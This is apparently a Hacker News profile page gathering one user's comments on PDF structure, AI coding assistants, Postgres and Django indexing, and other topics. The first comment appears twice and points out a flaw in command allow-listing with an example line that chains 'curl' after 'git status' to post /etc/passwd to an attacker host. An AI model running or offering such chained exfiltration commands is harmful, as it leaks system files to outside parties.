But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'
https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
8,384 karma · joined December 3, 2010
I like automating things. Currently building lots of software in Python / Typescript / Postgres.
Contact me: aidankane on that google hosted email platform.
But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'
https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
Yesterday there was something similar that might have planted a seed in your mind like it did for other people.
But yeah. It's all just objects pointing at each other. It's mostly tree structured, but not entirely. You have a Catalog of Pages that have Resources, like Fonts (that are likely to be shared by multiple pages hence, not a tree). Each Page has Contents that are a stream of drawing instructions.
This gives you a sense of what it all looks like. The contents of a page is a stack based vector drawing system. Squint a little (or stick it through an LLM) and you'll see Tf switches to Font F4 from the resources at size 14.66, Tj is placing a char at a position etc.
2 0 obj
<<
/Type /Page
/Resources <<
/Font <<
/F4 4 0 R
>>
>>
/Contents 5 0 R
>>
endobj
5 0 obj
<<
/Length 340
>>
stream
q
BT
/F4 14.66 Tf
1 0 0 -1 0 .47981739 Tm
0 -13.2773438 Td <002B> Tj
10.5842743 0 Td <004C> Tj
ET
Q...
endstream
endobj
I'm going to hand wave away the 100+ different types of objects. But at it's core it's a simple model. mutool clean -d in.pdf out.pdf
If you look below you can see a Pages list (1 0 obj) that references (2 0 R) a Page (2 0 obj). 1 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 2 0 R ]
>>
endobj
2 0 obj
<<
/Type /Page
/Contents 5 0 R
...
>>
endobj
Rather than editing the PDFs in place, it's possible to update these objects to overwrite them by appending a new "generation" of an object. Notice the 0 has been incremented to a 1 here. This allows leaving the original PDF intact while making edits. 1 1 obj
<<
/Type /Pages
/Count 2
/Kids [ 2 0 R 200 0 R ]
>>
endobj
You can have anything inside a PDF that you want really and it could be orphaned so a PDF reader never picks up on it. There's nothing to say an object needs to be referenced (oh, there's a "trailer" at the end of the PDF that says where the Root node is, so they know where to start).The code interleaves rules and control flow, drops side effects like “exit” in functions and hinges on a stack of regex for parsing bash.
This isn’t something I’ve attempted before but it looks like a library like bashlex would give you a much cleaner and safer starting point.
For a “throwaway” script like this maybe it’s fine, but this is typical of the sort of thing I’m seeing spurted out and I’m fascinated to see what people’s codebases look like these days.
Don’t get me wrong, I use CC every day, but man, you do need to fight it to get something clean and terse.
https://gist.github.com/mrocklin/30099bcc5d02a6e7df373b4c259...
It’s also funny how these tools push people into patterns by accident. You’d never consider sending a customer’s details to a 3rd party for them just to send them back, right? And there’s nothing stopping someone from just working more directly with the tool call response themselves but the libraries are setup so you lean into the LLM more than is required (I know you more than anyone appreciate that the value they add here is parsing the fuzzy instruction into a tool call - not the call itself).
This reads to me like they think that the response from the tool doesn’t go back to the LLM.
I’ve not worked with tools but my understanding is that they’re a way to allow the LLM to request additional data from the client. Once the client executes the requested function, that response data then goes to the LLM to be further processed into a final response.
https://github.com/anthropics/claude-code/blob/main/plugins/...
In the examples given, it’s much faster, but is that mostly due to the missing indexes? I’d have thought that an optimal approach in the colour example would be to look at the product.color_id index, get the counts directly from there and you’re pretty much done.
I have a feeling that Postgres doesn’t make that optimisation (I’ve looked before, but it was older Postgres). And I guess depending on the aggregation maybe it’s not useful in the general case. Maybe in this new world it _can_ make that optimisation?
Anyway, as ever, pg just getting faster is always good.
Was already familiar with and using Hypothesis in Python so went in search of something with similar nice ergonomics. Am happy with fast-check in that regard.
We use it for to allow us to connect in from the outside (and user to user access etc), but not for service to service connections.
https://www.reddit.com/r/DIYUK/comments/133jq4r/the_is_this_...
Edit: relatedly - at what size do you need a cto?
Edit to say: this is for MS files like Excel docs
Worst was sourcing the parts though. Getting the thing out, effectively getting it up on blocks to run it and see the issue was hard work. Getting the specific totally non-standard o-ring size out of the manufacturer was impossible. In the end I resorted to siliconing but I just cannot dump something like that over a 5c part.
So I think you and I differ on this one, but none of this is a hill I care to die on.
Serves more as a reminder to the youngsters out there that potential future hirers will use things like this to inform hiring decisions. Legal or not, your history follows you around (I’m old enough to be lucky to not have the stupid stuff I did early in my career available online). Be free, go build stuff for fun but keep clear of your employers space.
Obviously, I love the likes of Tailscale for embracing and supporting this behaviour - but that’s super exceptional (because they’re a strong team).
Django automatically creates an index on the referencing table to ensure that joins are fast. The fact that you have the relationship in the ORM means that’s how you’re likely to access the data so it makes perfect sense.
The mental model mismatch I’ve seen is that people appear to think of the relationship as being on the parent object “pointing” at the child table.
My assumption is that people have used orms that automatically add the index for you when you create a relationship so they just conflate them all. Often they’ll say that a foreign key is needed to improve the performance and when you dig into it, their mental model is all wrong. The sense they have is that the other table gets some sort of relationship array structure to make lookups fast.
It’s an interesting phenomenon of the abstraction.
Don’t get me wrong, I love sqlalchemy and alembic but probably because I understand what’s happening underneath so I know the right way to hold it so things are efficient and migrations are safe.
At the end of the article they mention digging in to the Amiga scene. If you want to feel old, Deluxe Paint turns 40 this year. My mates had Amigas (I had an Amstrad) and the computing world just felt full of wonder and promise. It was a magical time of creation.